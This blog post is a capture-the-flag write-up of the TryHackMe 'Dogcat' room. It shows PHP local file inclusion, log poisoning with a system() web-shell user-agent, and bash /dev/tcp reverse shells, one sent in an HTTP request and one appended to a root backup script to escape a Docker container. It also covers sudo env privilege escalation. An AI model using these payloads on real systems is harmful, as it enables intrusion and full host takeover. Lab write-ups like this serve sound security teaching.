<!doctype html><html lang="en" data-mode="dark"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7"><meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"><meta name="viewport" content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover" ><meta name="generator" content="Jekyll v4.3.3" /><meta property="og:title" content="Dogcat" /><meta name="author" content="Ibrahim" /><meta property="og:locale" content="en" /><meta name="description" content="I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container." /><meta property="og:description" content="I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container." /><link rel="canonical" href="/posts/dogcat/" /><meta property="og:url" content="/posts/dogcat/" /><meta property="og:site_name" content="Ibrahim EO." /><meta property="og:type" content="article" /><meta property="article:published_time" content="2024-03-20T00:00:00+01:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Dogcat" /><meta name="twitter:site" content="@twitter_username" /><meta name="twitter:creator" content="@Ibrahim" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Ibrahim"},"dateModified":"2024-06-30T13:33:37+02:00","datePublished":"2024-03-20T00:00:00+01:00","description":"I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container.","headline":"Dogcat","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/dogcat/"},"url":"/posts/dogcat/"}</script><title>Dogcat | Ibrahim EO.</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Ibrahim EO."><meta name="application-name" content="Ibrahim EO."><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="/assets/css/elomarii-portfolio.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.5.2/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.27.20/dist/tocbot.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css"><body><aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end"><header class="profile-wrapper"> <a href="/" id="avatar" class="rounded-circle"><img src="/assets/avatar.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a><h1 class="site-title"> <a href="/whoami">Ibrahim EO.</a></h1><p class="site-subtitle fst-italic mb-0">InfoSec Enthousiaste</p></header><nav class="flex-column flex-grow-1 w-100 ps-0"><ul class="nav"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/projects/" class="nav-link"> <i class="fa-fw fas fa-bars-progress"></i> <span>PROJECTS</span> </a><li class="nav-item"> <a href="/blog/" class="nav-link"> <i class="fa-fw fas fa-newspaper"></i> <span>BLOG</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tags"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/whoami/" class="nav-link"> <i class="fa-fw fas fa-chess-rook"></i> <span>WHOAMI</span> </a></ul></nav><div class="sidebar-bottom d-flex flex-wrap align-items-center w-100"> <a href="https://github.com/elomarii" aria-label="github" target="_blank" rel="noopener noreferrer" > <i class="fab fa-github"></i> </a> <a href="https://www.linkedin.com/in/ibrahim-el-omari/" aria-label="linkedin" target="_blank" rel="noopener noreferrer" > <i class="fab fa-linkedin"></i> </a> <a href="javascript:location.href = 'mailto:' + ['i.ibrahim.elomari','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a></div></aside><div id="main-wrapper" class="d-flex justify-content-center"><div class="container d-flex flex-column px-xxl-5"><header id="topbar-wrapper" aria-label="Top Bar"><div id="topbar" class="d-flex align-items-center justify-content-between px-lg-3 h-100" ><nav id="breadcrumb" aria-label="Breadcrumb"> <span> <a href="/">Home</a> </span> <span>Dogcat</span></nav><button type="button" id="sidebar-trigger" class="btn btn-link"> <i class="fas fa-bars fa-fw"></i> </button><div id="topbar-title"> Post</div><button type="button" id="search-trigger" class="btn btn-link"> <i class="fas fa-search fa-fw"></i> </button> <search id="search" class="align-items-center ms-3 ms-lg-0"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..." > </search> <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button></div></header><div class="row flex-grow-1"><main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4"><article class="px-1"><header><h1 data-toc-skip>Dogcat</h1><p class="post-desc fw-light mb-4">I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container.</p><div class="post-meta text-muted"> <span> Posted <time data-ts="1710889200" data-df="ll" data-bs-toggle="tooltip" data-bs-placement="bottom" > Mar 20, 2024 </time> </span><div class="d-flex justify-content-between"> <span> By <em> Ibrahim </em> </span><div> <span class="readtime" data-bs-toggle="tooltip" data-bs-placement="bottom" title="1175 words" > <em>6 min</em> read</span></div></div></div></header><div class="content"><blockquote class="prompt-info"><p>I made this website for viewing cat and dog images with PHP. If you’re feeling down, come look at some dogs/cats!<br /> This machine may take a few minutes to fully start up.</p></blockquote><p><a href="https://tryhackme.com/room/dogcat">Link</a> to the room</p><p>Let’s start with a version and script scan against the target machine</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre>$ sudo nmap -sV -sC &lt;machine_ip&gt; -Pn -n --disable-arp-ping

&lt;...snip...&gt;
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
|   256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_  256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: dogcat
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</pre></table></code></div></div><p><a href="https://github.com/elomarii/CTF_4_DAY/assets/106914699/009bc8a6-b486-4d12-9bd3-484bdc1a8172" class="popup img-link shimmer"><img src="https://github.com/elomarii/CTF_4_DAY/assets/106914699/009bc8a6-b486-4d12-9bd3-484bdc1a8172" alt="image" loading="lazy"></a> <em>Home page of the web server</em></p><p>The web app is about images of cats and dogs, no surprise. Let’s fuzz for hidden content.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u "http://&lt;machine_ip&gt;/FUZZ"

&lt;...snip...&gt;
cats                    [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 160ms]
dogs                    [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 99ms]
</pre></table></code></div></div><p>We assume that these folders contain the content of the web app (images of cats and dogs). But we don’t have permission to access them.</p><p>Let’s try making use of the first flag’s hint:</p><blockquote class="prompt-tip"><p>There’s more to view than just cats and dogs…</p></blockquote><p>Notice that view is the name of the query argument when calling the api for a random cat/dog image. We can try and fuzz to discover more values that are accepted by that argument:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u "http://&lt;machine_ip&gt;/?view=FUZZ" -fs 455

&lt;...snip...&gt;
category                [Status: 200, Size: 759, Words: 106, Lines: 24, Duration: 39ms]
&lt;...snip...&gt;
</pre></table></code></div></div><p>The command returns many entries. Note that <code class="language-plaintext highlighter-rouge">-fs 455</code> is used to exclude entries that return the standard response of “Sorry, only dogs or cats are allowed”.</p><p>Navigating to <code class="language-plaintext highlighter-rouge">http://&lt;machine_ip&gt;/?view=catalog</code>, we get the following: <a href="https://github.com/elomarii/CTF_4_DAY/assets/106914699/70e44b57-bf4b-45cd-a15e-889d8d9d2e49" class="popup img-link shimmer"><img src="https://github.com/elomarii/CTF_4_DAY/assets/106914699/70e44b57-bf4b-45cd-a15e-889d8d9d2e49" alt="image" loading="lazy"></a></p><p>Alright, now we know that the value of <code class="language-plaintext highlighter-rouge">view</code> is attached to “.php” extension and then passed to the <code class="language-plaintext highlighter-rouge">include</code> function.<br /> Since this is the case, we can use a php filter to disclose the source code of php files in the server. But first, let’s see what php files do we have there:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt:FUZZ -u "http://&lt;machine_ip&gt;/FUZZ" -e .php

&lt;...snip...&gt;
flag.php                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 43ms]
&lt;...snip...&gt;
</pre></table></code></div></div><p>Interestingly, we found a flag file. Now we can use the read filter to get its content encoded in base64.<br /> When testing the payload, I was getting the “Sorry, only dogs or cats are allowed” error, so I tried many assumptions on how the app verifies these conditions. One of them, which later succeeded, is that the app checks if the value of the path contains “cat” or “dog”.<br /> Hence, to get the flag, we pass the value <code class="language-plaintext highlighter-rouge">http://&lt;machine_ip&gt;/?view=php://filter/read=convert.base64-encode/resource=cats/../flag</code>. We used “cats” because this is an existing folder on the server, and from which we know the relative location of “flag.php”.</p><p>We decode the base64 string and get our first flag.</p><p>Having access to php files on the server, we need to figure out how to get more access.<br /> Let’s get the index file (same directory as flag.php) and see how the app actually works.</p><div file="flag.php" class="language-php highlighter-rouge"><div class="code-header"> <span data-label-text="flag.php"><i class="far fa-file-code fa-fw"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre><td class="rouge-code"><pre># ...snip...
        <span class="cp">&lt;?php</span>
            <span class="k">function</span> <span class="n">containsStr</span><span class="p">(</span><span class="nv">$str</span><span class="p">,</span> <span class="nv">$substr</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">return</span> <span class="nb">strpos</span><span class="p">(</span><span class="nv">$str</span><span class="p">,</span> <span class="nv">$substr</span><span class="p">)</span> <span class="o">!==</span> <span class="kc">false</span><span class="p">;</span>
            <span class="p">}</span>
            <span class="nv">$ext</span> <span class="o">=</span> <span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"ext"</span><span class="p">])</span> <span class="o">?</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s2">"ext"</span><span class="p">]</span> <span class="o">:</span> <span class="s1">'.php'</span><span class="p">;</span>
            <span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'view'</span><span class="p">]))</span> <span class="p">{</span>
                <span class="k">if</span><span class="p">(</span><span class="nf">containsStr</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'view'</span><span class="p">],</span> <span class="s1">'dog'</span><span class="p">)</span> <span class="o">||</span> <span class="nf">containsStr</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'view'</span><span class="p">],</span> <span class="s1">'cat'</span><span class="p">))</span> <span class="p">{</span>
                    <span class="k">echo</span> <span class="s1">'Here you go!'</span><span class="p">;</span>
                    <span class="k">include</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'view'</span><span class="p">]</span> <span class="mf">.</span> <span class="nv">$ext</span><span class="p">;</span>
                <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
                    <span class="k">echo</span> <span class="s1">'Sorry, only dogs or cats are allowed.'</span><span class="p">;</span>
                <span class="p">}</span>
            <span class="p">}</span>
        <span class="cp">?&gt;</span>
# ...snip...
</pre></table></code></div></div><p>First, we now validate how the app decides when a value of <em>view</em> is valid. Second, the URL argument <em>ext</em> is used to specify the extension of the file to include, and thus, we can now include whatever file (according to permissions) on the server.</p><p>One common method to exploit LFI vulnerabilities is log poisoning. For this, we poison our user-agent to achieve RCE when we include the log file.</p><ul><li>Log file location: <code class="language-plaintext highlighter-rouge">/var/log/apache2/access.log</code><li>User Agent: <code class="language-plaintext highlighter-rouge">&lt;h1&gt;&lt;?php system($_GET['cmd']); ?&gt;&lt;/h1&gt;</code><li>Result when visiting <code class="language-plaintext highlighter-rouge">http://&lt;machine_ip&gt;/?view=cats/../../../../var/log/apache2/access.log&amp;ext=&amp;cmd=id</code></ul><p><a href="https://github.com/elomarii/CTF_4_DAY/assets/106914699/62233aba-1ee3-4977-9435-09672e19054a" class="popup img-link shimmer"><img src="https://github.com/elomarii/CTF_4_DAY/assets/106914699/62233aba-1ee3-4977-9435-09672e19054a" alt="image" loading="lazy"></a> <em>Poisonned logs</em></p><p>Now that we can execute commands on the target machine, let’s first get a reverse shell.<br /> We can use Burpsuite to manipulate the HTTP request, the crafted request I used is the following, where the bash command used is <code class="language-plaintext highlighter-rouge">bash -c 'exec bash -i &amp;&gt;/dev/tcp/$RHOST/$RPORT &lt;&amp;1'</code>. Don’t forget to start a listener on your machine before sending the request.</p><div class="language-http highlighter-rouge"><div class="code-header"> <span data-label-text="Http"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre><span class="nf">GET</span> <span class="nn">/?view=cats/../../../../var/log/apache2/access.log&amp;ext=&amp;cmd=bash+-c+'exec+bash+-i+%26&gt;/dev/tcp/&lt;rhost&gt;/&lt;rport&gt;+&lt;%261'</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="p">:</span> <span class="s">&lt;machine_ip&gt;</span>
<span class="na">Accept-Encoding</span><span class="p">:</span> <span class="s">gzip, deflate, br</span>
<span class="na">Accept</span><span class="p">:</span> <span class="s">*/*</span>
<span class="na">Accept-Language</span><span class="p">:</span> <span class="s">en-US;q=0.9,en;q=0.8</span>
<span class="na">User-Agent</span><span class="p">:</span> <span class="s">nothing</span>
<span class="na">Connection</span><span class="p">:</span> <span class="s">close</span>
<span class="na">Cache-Control</span><span class="p">:</span> <span class="s">max-age=0</span>
</pre></table></code></div></div><p>We find the second flag on the parent folder where the app lives (execute command <code class="language-plaintext highlighter-rouge">ls ..</code>).</p><p>For our next flag, we can try and see if <code class="language-plaintext highlighter-rouge">www-data</code> (our user) can execute any commands as root with no password. And bang, yes we can:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>www-data@e43f08c3313d:/var/www/html$ sudo -l

Matching Defaults entries for www-data on e43f08c3313d:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on e43f08c3313d:
    (root) NOPASSWD: /usr/bin/env
</pre></table></code></div></div><p>We can use <code class="language-plaintext highlighter-rouge">env</code> to execute commands as root. As a consequence, we enumerate the content of <code class="language-plaintext highlighter-rouge">/root</code> and find the third flag.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>www-data@e43f08c3313d:/var/www/html$ sudo env cat /root/flag3.txt
</pre></table></code></div></div><p>As for the last flag, and with respect to the room description, we need to beak out of the docker container running the web app.<br /> To continue working as root we execute the following command</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>www-data@e43f08c3313d:/var/www/html$ sudo env bash -i
</pre></table></code></div></div><p>One of the ways to break out from the container is to inspect drives owned by the user (the one who runs the container) on the host system.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre>root@e43f08c3313d:/var/www/html# df -h

Filesystem      Size  Used Avail Use% Mounted on
overlay         9.8G  5.3G  4.0G  57% /
tmpfs            64M     0   64M   0% /dev
tmpfs           240M     0  240M   0% /sys/fs/cgroup
shm              64M     0   64M   0% /dev/shm
/dev/xvda2      9.8G  5.3G  4.0G  57% /opt/backups
tmpfs           240M     0  240M   0% /proc/acpi
tmpfs           240M     0  240M   0% /proc/scsi
tmpfs           240M     0  240M   0% /sys/firmware
</pre></table></code></div></div><p><code class="language-plaintext highlighter-rouge">/opt/backup</code> is mounted on <code class="language-plaintext highlighter-rouge">/dev/xvda2</code> in the host filesystem and occupies most of the space of the container. Checking its content, we find a script that is run regularly by root on the host machine to back up the container. Because we have permissions to write to that file, we can send a reverse shell back to our machine:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>root@e43f08c3313d:/var/www/html# ls -l /opt/backups
ls -l /opt/backups
total 2884
-rwxr--r-- 1 root root     123 Mar  1 16:33 backup.sh
-rw-r--r-- 1 root root 2949120 Mar  1 16:40 backup.tar

root@e43f08c3313d:/var/www/html# echo "bash -c 'exec bash -i &amp;&gt;/dev/tcp/&lt;rhost&gt;/&lt;rport&gt; &lt;&amp;1'" &gt;&gt; /opt/backups/backup.sh
</pre></table></code></div></div><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre>kali@kali$ nc -lvnp &lt;rport&gt;

listening on [any] &lt;rport&gt; ...
connect to &lt;rhost&gt; from (UNKNOWN) &lt;machine_ip&gt; 57198
bash: cannot set terminal process group (3365): Inappropriate ioctl for device
bash: no job control in this shell
root@dogcat:~# ls
ls
container
flag4.txt
root@dogcat:~# cat flag4.txt
</pre></table></code></div></div></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw me-1"></i> <a href="/blog/ctf-writeups/">CTF Writeups</a>, <a href="/blog/try-hack-me/">Try Hack Me</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw me-1"></i> <a href="/tags/lfi/" class="post-tag no-text-decoration" >LFI</a> <a href="/tags/docker/" class="post-tag no-text-decoration" >Docker</a></div><div class=" post-tail-bottom d-flex justify-content-between align-items-center mt-5 pb-2 " ><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper d-flex align-items-center"> <span class="share-label text-muted">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Dogcat%20-%20Ibrahim%20EO.&url=%2Fposts%2Fdogcat%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter"> <i class="fa-fw fa-brands fa-square-x-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Dogcat%20-%20Ibrahim%20EO.&u=%2Fposts%2Fdogcat%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=%2Fposts%2Fdogcat%2F&text=Dogcat%20-%20Ibrahim%20EO." target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <button id="copy-link" aria-label="Copy link" class="btn small" data-bs-toggle="tooltip" data-bs-placement="top" title="Copy link" data-title-succeed="Link copied successfully!" > <i class="fa-fw fas fa-link pe-none fs-6"></i> </button> </span></div></div></div></article></main><aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 mb-5 text-muted"><div class="access"><section id="access-lastmod"><h2 class="panel-heading">Recently Updated</h2><ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2"><li class="text-truncate lh-lg"> <a href="/posts/k-cessation/">K-Cessation</a><li class="text-truncate lh-lg"> <a href="/posts/race-condition/">Race Conditions Challenge</a><li class="text-truncate lh-lg"> <a href="/projects/attack-titan/">The Attack Titan</a><li class="text-truncate lh-lg"> <a href="/posts/wonderland/">Wonderland</a><li class="text-truncate lh-lg"> <a href="/posts/startup/">Startup</a></ul></section><section><h2 class="panel-heading">Trending Tags</h2><div class="d-flex flex-wrap mt-3 mb-1 me-3"> <a class="post-tag btn btn-outline-primary" href="/tags/cryptography/">Cryptography</a> <a class="post-tag btn btn-outline-primary" href="/tags/john/">john</a> <a class="post-tag btn btn-outline-primary" href="/tags/gpg/">GPG</a> <a class="post-tag btn btn-outline-primary" href="/tags/lfi/">LFI</a> <a class="post-tag btn btn-outline-primary" href="/tags/wireshark/">Wireshark</a> <a class="post-tag btn btn-outline-primary" href="/tags/apache2/">Apache2</a> <a class="post-tag btn btn-outline-primary" href="/tags/aws/">AWS</a> <a class="post-tag btn btn-outline-primary" href="/tags/binwalk/">binwalk</a> <a class="post-tag btn btn-outline-primary" href="/tags/borg/">borg</a> <a class="post-tag btn btn-outline-primary" href="/tags/c/">C</a></div></section></div></aside></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4"><aside id="related-posts" aria-labelledby="related-label"><h3 class="mb-4" id="related-label">Further Reading</h3><nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4"><article class="col"> <a href="/projects/attack-titan/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1720562400" data-df="ll" > Jul 10, 2024 </time><h4 class="pt-0 my-2">The Attack Titan</h4><div class="text-muted"><p>Embark on a daring mission with the Scouts to unravel the mysteries of a merciless world in this Attack on Titan-inspired CTF challenge!</p></div></div></a></article><article class="col"> <a href="/posts/overpass-2-hacked/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1710198000" data-df="ll" > Mar 12, 2024 </time><h4 class="pt-0 my-2">Overpass 2 Hacked</h4><div class="text-muted"><p>Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the a...</p></div></div></a></article><article class="col"> <a href="/posts/overpass/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1710025200" data-df="ll" > Mar 10, 2024 </time><h4 class="pt-0 my-2">Overpass</h4><div class="text-muted"><p>What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!</p></div></div></a></article></nav></aside><nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation"> <a href="/posts/overpass-3-hosting/" class="btn btn-outline-primary" aria-label="Older" ><p>Overpass 3 Hosting</p></a> <a href="/projects/attack-titan/" class="btn btn-outline-primary" aria-label="Newer" ><p>The Attack Titan</p></a></nav><footer aria-label="Site Info" class=" d-flex flex-column justify-content-center text-muted flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3 " ><p>© <time>2024</time> <a href="https://github.com/elomarii">Ibrahim El Omari</a>. <span data-bs-toggle="tooltip" data-bs-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author." >Some rights reserved.</span></p><p>Using the <a data-bs-toggle="tooltip" data-bs-placement="top" title="v7.0.1" href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener" >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.</p></footer></div></div><div id="search-result-wrapper" class="d-flex justify-content-center d-none"><div class="col-11 content"><div id="search-hints"><section><h2 class="panel-heading">Trending Tags</h2><div class="d-flex flex-wrap mt-3 mb-1 me-3"> <a class="post-tag btn btn-outline-primary" href="/tags/cryptography/">Cryptography</a> <a class="post-tag btn btn-outline-primary" href="/tags/john/">john</a> <a class="post-tag btn btn-outline-primary" href="/tags/gpg/">GPG</a> <a class="post-tag btn btn-outline-primary" href="/tags/lfi/">LFI</a> <a class="post-tag btn btn-outline-primary" href="/tags/wireshark/">Wireshark</a> <a class="post-tag btn btn-outline-primary" href="/tags/apache2/">Apache2</a> <a class="post-tag btn btn-outline-primary" href="/tags/aws/">AWS</a> <a class="post-tag btn btn-outline-primary" href="/tags/binwalk/">binwalk</a> <a class="post-tag btn btn-outline-primary" href="/tags/borg/">borg</a> <a class="post-tag btn btn-outline-primary" href="/tags/c/">C</a></div></section></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><aside aria-label="Scroll to Top"> <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow"> <i class="fas fa-angle-up"></i> </button></aside></div><div id="mask"></div><aside id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-bs-animation="true" data-bs-autohide="false" ><div class="toast-header"> <button type="button" class="btn-close ms-auto" data-bs-dismiss="toast" aria-label="Close" ></button></div><div class="toast-body text-center pt-0"><p class="px-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></aside><script src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.11/dayjs.min.js,npm/dayjs@1.11.11/locale/en.min.js,npm/dayjs@1.11.11/plugin/relativeTime.min.js,npm/dayjs@1.11.11/plugin/localizedFormat.min.js"></script> <script src="/assets/js/dist/post.min.js"></script> <script defer src="/app.min.js"></script> <script>SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<article class="px-1 px-sm-2 